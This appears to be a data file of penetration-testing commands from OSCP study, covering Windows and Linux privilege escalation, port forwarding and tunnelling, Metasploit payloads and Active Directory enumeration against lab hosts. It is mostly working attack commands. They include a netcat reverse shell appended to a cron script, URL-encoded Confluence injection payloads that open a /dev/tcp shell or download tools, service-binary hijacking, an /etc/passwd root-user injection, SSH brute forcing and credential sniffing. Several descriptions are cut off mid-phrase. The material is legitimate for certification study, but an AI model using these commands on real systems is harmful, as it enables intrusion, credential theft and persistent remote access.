Information about the network configuration + - cmd: route print + lang: ps1 + tags: oscp + desc: Routing table on CLIENTWK220 + - cmd: netstat -ano + lang: ps1 + tags: oscp + desc: Active network connections on CLIENTWK220 + - cmd: Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname ; Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname + lang: ps1 + tags: oscp + desc: Installed applications on CLIENTWK220 + - cmd: Get-Process + lang: ps1 + tags: oscp + desc: Running processes on CLIENTWK220 + - cmd: Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue + lang: ps1 + tags: oscp + desc: Searching for sensitive information in XAMPP directory + - cmd: type C:\xampp\passwords.txt ; type C:\xampp\mysql\bin\my.ini + lang: ps1 + tags: oscp + desc: Review the contents of passwords.txt and my.ini + - cmd: Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue + lang: ps1 + tags: oscp + desc: Searching for text files and password manager databases in the home directory of dave + - cmd: cat Desktop\asdf.txt + lang: ps1 + tags: oscp + desc: Contents of asdf.txt + - cmd: net user steve + lang: ps1 + tags: oscp + desc: Local groups user steve is a member of + - cmd: type C:\xampp\mysql\bin\my.ini + lang: ps1 + tags: oscp + desc: Contents of the my.ini file + - cmd: net user backupadmin + lang: ps1 + tags: oscp + desc: Local groups backupadmin is a member of + - cmd: runas /user:backupadmin cmd + lang: ps1 + tags: oscp + desc: Using Runas to execute cmd as user backupadmin + - cmd: Get-History + lang: ps1 + tags: oscp + desc: Empty result from GetHistory + - cmd: (Get-PSReadlineOption).HistorySavePath + lang: ps1 + tags: oscp + desc: Display path of the history file from PSReadline + - cmd: type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt + lang: ps1 + tags: oscp + desc: Empty result from GetHistory + - cmd: type C:\Users\Public\Transcripts\transcript01.txt + lang: ps1 + tags: oscp + desc: Contents of the transcript file + - cmd: $password = ConvertTo-SecureString "qwertqwertqwert123!!" -AsPlainText -Force ; $cred = New-Object System.Management.Automation.PSCredential("daveadmin", $password) ; Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred + lang: ps1 + tags: oscp + desc: Using the commands from the transcript file to obtain a PowerShell session as daveadmin + - cmd: evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!" + lang: ps1 + tags: oscp + desc: Using evilwinrm to connect to CLIENTWK220 as daveadmin + - cmd: icacls "C:\xampp\apache\bin\httpd.exe" + lang: ps1 + tags: oscp + desc: Permissions of _httpd.exe_ + - cmd: x86_64-w64-mingw32-gcc adduser.c -o adduser.exe + lang: sh + tags: oscp + desc: CrossCompile the C Code to a 64bit application + - cmd: iwr -uri http://192.168.119.3/adduser.exe -Outfile adduser.exe ; move C:\xampp\mysql\bin\mysqld.exe mysqld.exe ; move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe + lang: ps1 + tags: oscp + desc: Replacing mysqld.exe with our malicious binary + - cmd: net stop mysql + lang: ps1 + tags: oscp + desc: Attempting to stop the service in order to restart it + - cmd: Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'} + lang: ps1 + tags: oscp + desc: Obtain Startup Type for mysql service + - cmd: whoami /priv + lang: ps1 + tags: oscp + desc: Checking for reboot privileges + - cmd: shutdown /r /t 0 + lang: ps1 + tags: oscp + desc: Rebooting the machine + - cmd: Get-LocalGroupMember administrators + lang: ps1 + tags: oscp + desc: Display members of the local administrators group + - cmd: iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1 ; powershell -ep bypass ; . .\PowerUp.ps1 ; Get-ModifiableServiceFile + lang: ps1 + tags: oscp + desc: Import PowerUp.ps1 and execute GetModifiableServiceFile + - cmd: Install-ServiceBinary -Name 'mysql' + lang: ps1 + tags: oscp + desc: Error from AbuseFunction + - cmd: $ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe' | Get-ModifiablePath -Literal ; $ModifiableFiles ; $ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe argument' | Get-ModifiablePath -Literal ; $ModifiableFiles ; $ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe argument -conf=C:\test\path' | Get-ModifiablePath -Literal ; $ModifiableFiles + lang: ps1 + tags: oscp + desc: Analyzing the function ModifiablePath + - cmd: icacls .\Documents\BetaServ.exe + lang: ps1 + tags: oscp + desc: Displaying permissions on the binary of BetaService + - cmd: Restart-Service BetaService + lang: ps1 + tags: oscp + desc: Restarting BetaService + - cmd: $env:path + lang: ps1 + tags: oscp + desc: Display the PATH environment variable + - cmd: x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll + lang: sh + tags: oscp + desc: CrossCompile the C++ Code to a 64bit DLL + - cmd: Restart-Service BetaService ; net user ; net localgroup administrators + lang: ps1 + tags: oscp + desc: Restart the service _BetaService_ and confirm _dave2_ was created as local administrator + - cmd: Get-CimInstance -ClassName win32_service | Select Name,State,PathName + lang: ps1 + tags: oscp + desc: List of services with binary path + - cmd: wmic service get name,pathname | findstr /i /v ... + lang: ps1 + tags: oscp + desc: List of services with spaces and missing quotes in the binary path + - cmd: Start-Service GammaService ; Stop-Service GammaService + lang: ps1 + tags: oscp + desc: Using StartService and StopService to check if user steve has permissions to start and stop GammaService + - cmd: icacls "C:\" ; icacls "C:\Program Files" + lang: ps1 + tags: oscp + desc: Reviewing permissions on the paths __C:\\__ and __C:\\Program Files\\__ + - cmd: icacls "C:\Program Files\Enterprise Apps" + lang: ps1 + tags: oscp + desc: Reviewing permissions on the __Enterprise Apps__ directory + - cmd: iwr -uri http://192.168.119.3/adduser.exe -Outfile Current.exe ; copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe' + lang: ps1 + tags: oscp + desc: Download adduser.exe, save it as Current.exe, and copy it to Enterprise Apps directory + - cmd: Start-Service GammaService ; net user ; net localgroup administrators + lang: ps1 + tags: oscp + desc: Start service GammaService and confirm that dave2 was created as member of local Administrators group + - cmd: iwr http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1 ; powershell -ep bypass ; . .\PowerUp.ps1 ; Get-UnquotedService + lang: ps1 + tags: oscp + desc: Using GetUnquotedService to list potential vulnerable services + - cmd: Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe" ; Restart-Service GammaService ; net user ; net localgroup administrators + lang: ps1 + tags: oscp + desc: Using the AbuseFunction to exploit the unquoted service path of GammaService + - cmd: schtasks /query /fo LIST /v + lang: ps1 + tags: oscp + desc: Display a list of all scheduled tasks on CLIENTWK220 + - cmd: icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe + lang: ps1 + tags: oscp + desc: Display permissions on the executable file __BackendCacheCleanup.exe__ + - cmd: iwr -Uri http://192.168.119.3/adduser.exe -Outfile BackendCacheCleanup.exe ; move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak ; move .\BackendCacheCleanup.exe .\Pictures\ + lang: ps1 + tags: oscp + desc: Download and replace executable file __BackendCacheCleanup.exe__ + - cmd: net user ; net localgroup administrators + lang: ps1 + tags: oscp + desc: Display permissions on the executable file __BackendCacheCleanup.exe__ + - cmd: .\PrintSpoofer64.exe -i -c powershell.exe + lang: ps1 + tags: oscp + desc: Using the _PrintSpoofer_ tool to get an interactive PowerShell session in the context of NT AUTHORITY\\SYSTEM. + - cmd: ls -l /etc/shadow + lang: sh + tags: oscp + desc: Inspecting file permissions and users ownership + - cmd: routel + lang: sh + tags: oscp + desc: Printing the routes on Linux + - cmd: ss -anp + lang: sh + tags: oscp + desc: Listing all + - cmd: cat /etc/iptables/rules.v4 + lang: sh + tags: oscp + desc: Inspecting custom IP tables + - cmd: ls -lah /etc/cron* + lang: sh + tags: oscp + desc: Listing all cron + - cmd: crontab -l + lang: sh + tags: oscp + desc: Listing cron jobs for the current user + - cmd: sudo crontab -l + lang: sh + tags: oscp + desc: Listing cron jobs for the root user + - cmd: dpkg -l + lang: sh + tags: oscp + desc: Listing all + - cmd: find / -writable -type d 2>/dev/null + lang: sh + tags: oscp + desc: Listing all world + - cmd: cat /etc/fstab ; mount + lang: sh + tags: oscp + desc: Listing content + - cmd: lsblk + lang: sh + tags: oscp + desc: Listing all + - cmd: lsmod + lang: sh + tags: oscp + desc: Listing loaded + - cmd: /sbin/modinfo libata + lang: sh + tags: oscp + desc: Displaying + - cmd: find / -perm -u=s -type f 2>/dev/null + lang: sh + tags: oscp + desc: Searching for + - cmd: env + lang: sh + tags: oscp + desc: Inspecting Environment Variables + - cmd: cat .bashrc + lang: sh + tags: oscp + desc: Inspecting .bashrc + - cmd: su - root + lang: sh + tags: oscp + desc: Becoming 'root' user with the leaked credential + - cmd: crunch 6 6 -t Lab%%% > wordlist + lang: sh + tags: oscp + desc: Generating a wordlist for a bruteforce attack + - cmd: cat wordlist + lang: sh + tags: oscp + desc: Inspecting the Wordlist Content + - cmd: hydra -l eve -P wordlist 192.168.50.214 -t 4 ssh -V + lang: sh + tags: oscp + desc: Successfully bruteforced eve's password + - cmd: ssh eve@192.168.50.214 + lang: sh + tags: oscp + desc: Successfully Logged in as eve + - cmd: sudo -i + lang: sh + tags: oscp + desc: Elevating to root + - cmd: watch -n 1 "ps -aux | grep pass" + lang: sh + tags: oscp + desc: Harvesting Active Processes for Credentials + - cmd: sudo tcpdump -i lo -A | grep "pass" + lang: sh + tags: oscp + desc: Using tcpdump to Perform Password Sniffing + - cmd: grep "CRON" /var/log/syslog + lang: sh + tags: oscp + desc: Inspecting the cron log file + - cmd: cat /home/joe/.scripts/user_backups.sh ; ls -lah /home/joe/.scripts/user_backups.sh + lang: sh + tags: oscp + desc: Showing the content and + - cmd: cd .scripts ; echo >> user_backups.sh ; echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.118.2 1234 >/tmp/f" >> user_backups.sh ; cat user_backups.sh + lang: sh + tags: oscp + desc: Inserting a reverse shell + - cmd: openssl passwd w00t ; echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd ; su root2 ; w00t ; id + lang: sh + tags: oscp + desc: Escalating privileges by + - cmd: passwd + lang: sh + tags: oscp + desc: Executing the passswd program + - cmd: ps u -C passwd + lang: sh + tags: oscp + desc: Inspecting passwd's process credentials + - cmd: grep Uid /proc/1932/status + lang: sh + tags: oscp + desc: Inspecting passwd's process credentials + - cmd: cat /proc/1131/status | grep Uid + lang: sh + tags: oscp + desc: Inspecting passwd's process credentials + - cmd: ls -asl /usr/bin/passwd + lang: sh + tags: oscp + desc: Revealing the SUID flag in the passwd binary application + - cmd: find /home/joe/Desktop -exec "/usr/bin/bash" -p \; + lang: sh + tags: oscp + desc: Getting a root shell by abusing SUID program + - cmd: /usr/sbin/getcap -r / 2>/dev/null + lang: sh + tags: oscp + desc: Manually Enumerating Capabilities + - cmd: perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' ; id + lang: sh + tags: oscp + desc: Getting a root shell through capabilities exploitation + - cmd: sudo -l + lang: sh + tags: oscp + desc: Inspecting current user's sudo permissions + - cmd: COMMAND='id' ; TF=$(mktemp) ; echo "$COMMAND" > $TF ; chmod +x $TF ; sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root + lang: sh + tags: oscp + desc: Attempting to abuse tcpdump sudo permissions + - cmd: cat /var/log/syslog | grep tcpdump + lang: sh + tags: oscp + desc: Inspecting the syslog file for 'tcpdump' related events + - cmd: su - root ; aa-status + lang: sh + tags: oscp + desc: Verifying AppArmon status + - cmd: sudo apt-get changelog apt ; id + lang: sh + tags: oscp + desc: Obtaining a root shell by abusing sudo permissions + - cmd: cat /etc/issue + lang: sh + tags: oscp + desc: Gathering general information on + - cmd: uname -r ; arch + lang: sh + tags: oscp + desc: Gathering kernel and + - cmd: searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8" + lang: sh + tags: oscp + desc: Using searchsploit to + - cmd: cp /usr/share/exploitdb/exploits/linux/local/45010.c . ; head 45010.c -n 20 + lang: sh + tags: oscp + desc: Identifying the exploit source code instructions. + - cmd: mv 45010.c cve-2017-16995.c + lang: sh + tags: oscp + desc: Renaming the Exploit + - cmd: gcc cve-2017-16995.c -o cve-2017-16995 + lang: sh + tags: oscp + desc: Compiling the Exploit on the target machine + - cmd: file cve-2017-16995 + lang: sh + tags: oscp + desc: Examining the exploit binary file's architecture + - cmd: curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/ + lang: sh + tags: oscp + desc: Executing the modified reverse shell payload. + - cmd: id + lang: sh + tags: oscp + desc: Bash reverse shell caught by our Netcat listener, and confirmed with the id command. + - cmd: ip addr + lang: sh + tags: oscp + desc: Enumerating network interfaces on CONFLUENCE01. + - cmd: ip route + lang: sh + tags: oscp + desc: Enumerating routes on CONFLUENCE01. + - cmd: cat /var/atlassian/application-data/confluence/confluence.cfg.xml + lang: sh + tags: oscp + desc: The credentials found in the Confluence confluence.cfg.xml file on CONFLUENCE01. + - cmd: socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432 + lang: sh + tags: oscp + desc: Running the Socat port forward command. + - cmd: psql -h 192.168.50.63 -p 2345 -U postgres ; \l + lang: sh + tags: oscp + desc: Connecting to the PGDATABASE01 PostgreSQL service and listing databases using psql, through our port forward. + - cmd: \c confluence ; select * from cwd_user; + lang: sh + tags: oscp + desc: The contents of the cwd_user table in the confluence database. + - cmd: hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt + lang: sh + tags: oscp + desc: Hashcat having cracked the database_admin, hr_admin and rdp_admin account hashes. + - cmd: ssh database_admin@192.168.50.63 -p2222 ; yes + lang: sh + tags: oscp + desc: Connecting to SSH server on PGDATABASE01, through the port forward on CONFLUENCE01. + - cmd: python3 -c 'import pty; pty.spawn("/bin/bash")' ; ssh database_admin@10.4.50.215 + lang: sh + tags: oscp + desc: Giving our reverse shell TTY functionality with Python3's pty, and logging into PGDATABASE01 as database_admin. + - cmd: for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done + lang: sh + tags: oscp + desc: Using a bash loop with Netcat to sweep for port 445 in the newlyfound subnet. + - cmd: ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215 + lang: sh + tags: oscp + desc: Running the local port forward command. + - cmd: proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217 + lang: sh + tags: oscp + desc: The NmapoverProxychains command output. + - cmd: python3 -c 'import pty; pty.spawn("/bin/bash")' ; ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4 ; yes + lang: sh + tags: oscp + desc: The SSH remote port forward being set up, connecting to the Kali machine. + - cmd: psql -h 127.0.0.1 -p 2345 -U postgres ; \l + lang: sh + tags: oscp + desc: Listing databases on the PGDATABASE01, using psql through the SSH remote port forward. + - cmd: python3 -c 'import pty; pty.spawn("/bin/bash")' ; ssh -N -R 9998 kali@192.168.118.4 ; yes + lang: sh + tags: oscp + desc: Making the SSH connection with the remote dynamic port forwarding option. + - cmd: sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24 + lang: sh + tags: oscp + desc: Running sshuttle from our Kali machine, pointing to the forward port on CONFLUENCE01. + - cmd: xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64 ; y + lang: sh + tags: oscp + desc: Connecting to the RDP server on MULTISERVER03 using xfreerdp. + - cmd: where ssh + lang: sh + tags: oscp + desc: Finding ssh.exe on MULTISERVER03. + - cmd: ssh.exe -V + lang: sh + tags: oscp + desc: The version of OpenSSH client that is bundled with Windows is higher than 7.6. + - cmd: ssh -N -R 9998 kali@192.168.118.4 ; yes + lang: sh + tags: oscp + desc: Connecting back to our Kali machine to open the remote dynamic port forward. + - cmd: tail /etc/proxychains4.conf + lang: sh + tags: oscp + desc: Proxychains configuration file + - cmd: proxychains psql -h 10.4.50.215 -U postgres ; \l + lang: sh + tags: oscp + desc: Connecting to the PostgreSQL server with psql and Proxychains. + - cmd: sudo systemctl start apache2 + lang: sh + tags: oscp + desc: Starting Apache2. + - cmd: find / -name nc.exe 2>/dev/null ; sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/ + lang: sh + tags: oscp + desc: Copying nc.exe to the Apache2 webroot. + - cmd: C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446 + lang: sh + tags: oscp + desc: The nc.exe reverse shell payload we execute in the web shell. + - cmd: find / -name plink.exe 2>/dev/null ; sudo cp /usr/share/windows-resources/binaries/plink.exe /var/www/html/ + lang: sh + tags: oscp + desc: Copying plink.exe to our Apache2 webroot. + - cmd: C:\Windows\Temp\plink.exe -ssh -l kali -pw -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4 + lang: sh + tags: oscp + desc: Making an SSH connection to the Kali machine. + - cmd: xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833 ; y + lang: sh + tags: oscp + desc: Connecting to the RDP server with xfreerdp, through the Plink port forward. + - cmd: xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64 + lang: sh + tags: oscp + desc: Connecting to the RDP server with xfreerdp. + - cmd: netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215 + lang: sh + tags: oscp + desc: The portproxy command being run. + - cmd: netstat -anp TCP | find "2222" + lang: sh + tags: oscp + desc: netstat showing that TCP/2222 is listening on the external interface. + - cmd: netsh interface portproxy show all + lang: sh + tags: oscp + desc: Listing all the portproxy port forwarders set up with Netsh. + - cmd: netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow + lang: sh + tags: oscp + desc: Poking a hole in the Windows Firewall with Netsh. + - cmd: ssh database_admin@192.168.50.64 -p2222 + lang: sh + tags: oscp + desc: SSHing into PGDATABASE01 through the Netsh port forward. + - cmd: netsh advfirewall firewall delete rule name="port_forward_ssh_2222" + lang: sh + tags: oscp + desc: Deleting the firewall rule with Netsh. + - cmd: netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64 + lang: sh + tags: oscp + desc: Deleting the port forwarding rule with Netsh. + - cmd: sudo cp $(which chisel) /var/www/html/ + lang: sh + tags: oscp + desc: Copying the Chisel binary to the Apache2 server folder. + - cmd: tail -f /var/log/apache2/access.log + lang: sh + tags: oscp + desc: The request for the Chisel binary hitting our Apache2 server. + - cmd: chisel server --port 8080 --reverse + lang: sh + tags: oscp + desc: Starting the Chisel server on port 8080. + - cmd: sudo tcpdump -nvvvXi tun0 tcp port 8080 + lang: sh + tags: oscp + desc: Starting tcpdump to listen on TCP/8080 through the tun0 interface. + - cmd: chisel -h + lang: sh + tags: oscp + desc: The version of Chisel reported as part of the h output, along with the version of Go used to compile it. + - cmd: curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.118.4/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/ + lang: sh + tags: oscp + desc: The Wget payload executed within our cURL Confluence injection command, again. + - cmd: ss -ntplu + lang: sh + tags: oscp + desc: Using ss to check if our SOCKS port has been opened by the Kali Chisel server. + - cmd: sudo apt install ncat + lang: sh + tags: oscp + desc: Installing Ncat with apt. + - cmd: ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215 + lang: sh + tags: oscp + desc: A successful SSH connection through our Chisel HTTP tunnel. + - cmd: cd dns_tunneling ; cat dnsmasq.conf + lang: sh + tags: oscp + desc: The basic configuration for our Dnsmasq server. + - cmd: sudo dnsmasq -C dnsmasq.conf -d + lang: sh + tags: oscp + desc: Starting Dnsmasq with the basic configuration. + - cmd: resolvectl status + lang: sh + tags: oscp + desc: Checking the configured DNS server on PGDATABASE01. + - cmd: nslookup exfiltrated-data.feline.corp + lang: sh + tags: oscp + desc: Using nslookup to make a DNS request for exfiltrateddata.feline.corp + - cmd: cat dnsmasq_txt.conf ; sudo dnsmasq -C dnsmasq_txt.conf -d + lang: sh + tags: oscp + desc: Checking the TXT configuration file then starting Dnsmasq with it. + - cmd: nslookup -type=txt www.feline.corp + lang: ps1 + tags: oscp + desc: The TXT record response from www.feline.corp. + - cmd: sudo tcpdump -i ens192 udp port 53 + lang: sh + tags: oscp + desc: Starting tcpdump to listen for packets on UDP port 53. + - cmd: dnscat2-server feline.corp + lang: sh + tags: oscp + desc: Starting the dnscat2 server. + - cmd: ./dnscat feline.corp + lang: sh + tags: oscp + desc: The dnscat2 client running on PGDATABASE01. + - cmd: sudo msfdb init + lang: sh + tags: oscp + desc: Creating and initializing the Metasploit database + - cmd: sudo systemctl enable postgresql + lang: sh + tags: oscp + desc: Enabling the postgresql database service at boot time + - cmd: sudo msfconsole + lang: sh + tags: oscp + desc: Starting the Metasploit Framework + - cmd: msfvenom -l payloads --platform windows --arch x64 + lang: sh + tags: oscp + desc: Creating a Windows executable with a + - cmd: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o nonstaged.exe + lang: sh + tags: oscp + desc: Creating a Windows executable with a + - cmd: iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exe + lang: sh + tags: oscp + desc: Download nonstaged payload binary and execute it + - cmd: msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o staged.exe + lang: sh + tags: oscp + desc: Creating a Windows executable with a + - cmd: sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza + lang: sh + tags: oscp + desc: Gaining remote desktop access inside + - cmd: sudo msfconsole -r listener.rc + lang: sh + tags: oscp + desc: Executing the resource script + - cmd: iwr -uri http://192.168.119.4/met.exe -Outfile met.exe + lang: sh + tags: oscp + desc: Executing the Windows executable containing the Meterpreter payload + - cmd: ls -l /usr/share/metasploit-framework/scripts/resource + lang: sh + tags: oscp + desc: Listing all resource scripts provided by Metasploit + - cmd: xfreerdp /u:stephanie /d:corp.com /v:192.168.50.75 + lang: sh + tags: oscp + desc: Connecting to the Windows 11 client using "xfreerdp" + - cmd: net user /domain + lang: ps1 + tags: oscp + desc: Running "net user" to display users in the domain + - cmd: net user jeffadmin /domain + lang: ps1 + tags: oscp + desc: Running "net user" against a specific user + - cmd: net group /domain + lang: ps1 + tags: oscp + desc: Running "net group" to display groups in the domain + - cmd: net group "Sales Department" /domain + lang: ps1 + tags: oscp + desc: Running "net group" to display members in specific group + - cmd: C:\> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() + lang: ps1 + tags: oscp + desc: Domain class from System.DirectoryServices.ActiveDirectory namespace + - cmd: powershell -ep bypass ; .\enumeration.ps1 + lang: ps1 + tags: oscp + desc: Output displaying information stored in our first variable + - cmd: .\enumeration.ps1 + lang: ps1 + tags: oscp + desc: Printing the $PDC variable + - cmd: ([adsi]'').distinguishedName + lang: ps1 + tags: oscp + desc: Using ADSI to obtain the DN for the domain + - cmd: Import-Module .\function.ps1 + lang: ps1 + tags: oscp + desc: Importing our function to memory + - cmd: LDAPSearch -LDAPQuery "(samAccountType=805306368)" + lang: ps1 + tags: oscp + desc: Performing a user search using the new function + - cmd: LDAPSearch -LDAPQuery "(objectclass=group)" + lang: ps1 + tags: oscp + desc: Searching all possible groups in AD + - cmd: $sales = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Sales Department))" + lang: ps1 + tags: oscp + desc: Adding the search to our variable called $sales + - cmd: $sales.properties.member + lang: ps1 + tags: oscp + desc: Printing the member attribute on the Sales Department group object + - cmd: $group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Development Department*))" ; $group.properties.member + lang: ps1 + tags: oscp + desc: Printing the member attribute on the Development Department group object + - cmd: $group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Management Department*))" ; $group.properties.member + lang: ps1 + tags: oscp + desc: Printing the member attribute on the Management Department group object + - cmd: Import-Module .\PowerView.ps1 + lang: ps1 + tags: oscp + desc: Importing PowerView to memory + - cmd: Get-NetDomain + lang: ps1 + tags: oscp + desc: Obtaining domain information + - cmd: Get-NetUser + lang: ps1 + tags: oscp + desc: Querying users in the domain + - cmd: Get-NetUser | select cn + lang: ps1 + tags: oscp + desc: Querying users using select statement + - cmd: Get-NetUser | select cn,pwdlastset,lastlogon + lang: ps1 + tags: oscp + desc: Querying users displaying pwdlastset and lastlogon + - cmd: Get-NetGroup | select cn + lang: ps1 + tags: oscp + desc: Querying groups in the domain using PowerView + - cmd: Get-NetGroup "Sales Department" | select member + lang: ps1 + tags: oscp + desc: Enumerating the "Sales Department" group + - cmd: Get-NetComputer + lang: ps1 + tags: oscp + desc: Partial domain computer overview + - cmd: Get-NetComputer | select operatingsystem,dnshostname + lang: ps1 + tags: oscp + desc: Displaying OS and hostname + - cmd: Find-LocalAdminAccess + lang: ps1 + tags: oscp + desc: Scanning domain to find local administrative privileges for our user + - cmd: Get-NetSession -ComputerName files04 ; Get-NetSession -ComputerName web04 + lang: ps1 + tags: oscp + desc: Checking logged on users with GetNetSession + - cmd: Get-NetSession -ComputerName files04 -Verbose ; Get-NetSession -ComputerName web04 -Verbose + lang: ps1 + tags: oscp + desc: Adding verbosity to our GetNetSession command + - cmd: Get-NetSession -ComputerName client74 + lang: ps1 + tags: oscp + desc: Running GetNetSession on CLIENT74 + - cmd: Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl + lang: ps1 + tags: oscp + desc: Displaying permissions on the DefaultSecurity registry hive + - cmd: Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion + lang: ps1 + tags: oscp + desc: Querying operating system and version + - cmd: .\PsLoggedon.exe \\files04 + lang: ps1 + tags: oscp + desc: Using PsLoggedOn to see user logons at Files04 + - cmd: .\PsLoggedon.exe \\web04 + lang: ps1 + tags: oscp + desc: Using PsLoggedOn to see user logons at Web04 + - cmd: .\PsLoggedon.exe \\client74 + lang: ps1 + tags: oscp + desc: Using PsLoggedOn to see user logons at CLIENT74 + - cmd: setspn -L iis_service + lang: ps1 + tags: oscp + desc: Listing SPN linked to a certain user account + - cmd: Get-NetUser -SPN | select samaccountname,serviceprincipalname + lang: ps1 + tags: oscp + desc: Listing the SPN accounts in the domain + - cmd: nslookup.exe web04.corp.com + lang: ps1 + tags: oscp + desc: Resolving the web04.corp.com name + - cmd: Get-ObjectAcl -Identity stephanie + lang: ps1 + tags: oscp + desc: Running GetObjectAcl specifying our user + - cmd: Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104 + lang: ps1 + tags: oscp + desc: Converting the ObjectISD into name + - cmd: Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-553 + lang: ps1 + tags: oscp + desc: Converting the SecurityIdentifier into name + - cmd: Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights + lang: ps1 + tags: oscp + desc: Enumerating ACLs for the Management Group + - cmd: net group "Management Department" stephanie /add /domain + lang: ps1 + tags: oscp + desc: Using "net.exe" to add ourselves to domain group + - cmd: net group "Management Department" stephanie /del /domain + lang: ps1 + tags: oscp + desc: Using "net.exe" to remove ourselves from domain group + - cmd: Find-DomainShare + lang: ps1 + tags: oscp + desc: Domain Share Query + - cmd: ls \\dc1.corp.com\sysvol\corp.com\ + lang: ps1 + tags: oscp + desc: Listing contents of the SYSVOL share + - cmd: ls \\dc1.corp.com\sysvol\corp.com\Policies\ + lang: ps1 + tags: oscp + desc: Listing contents of the "SYSVOL\policies share" + - cmd: cat \\dc1.corp.com\sysvol\corp.com\Policies\oldpolicy\old-policy-backup.xml + lang: ps1 + tags: oscp + desc: Checking contents of oldpolicybackup.xml file + - cmd: gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE" + lang: ps1 + tags: oscp + desc: Using gppdecrypt to decrypt the password + - cmd: ls \\FILES04\docps1are + lang: sh + tags: oscp + desc: Listing the contents of docsare + - cmd: ls \\FILES04\docps1are\docs\do-not-ps1are + lang: sh + tags: oscp + desc: Listing the contents of donotps1are + - cmd: cat \\FILES04\docps1are\docs\do-not-ps1are\start-email.txt + lang: sh + tags: oscp + desc: Checking the "startemail.txt" file + - cmd: Import-Module .\Sharphound.ps1 + lang: ps1 + tags: oscp + desc: Importing the SharpHound script to memory + - cmd: Get-Help Invoke-BloodHound + lang: ps1 + tags: oscp + desc: Checking the SharpHound options + - cmd: Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\stephanie\Desktop\ -OutputPrefix "corp audit" + lang: ps1 + tags: oscp + desc: Running SharpHound to collect domain data + - cmd: ls C:\Users\stephanie\Desktop\ + lang: sh + tags: oscp + desc: SharpHound generated files + - cmd: sudo neo4j start + lang: sh + tags: oscp + desc: Starting the Neo4j service in Kali 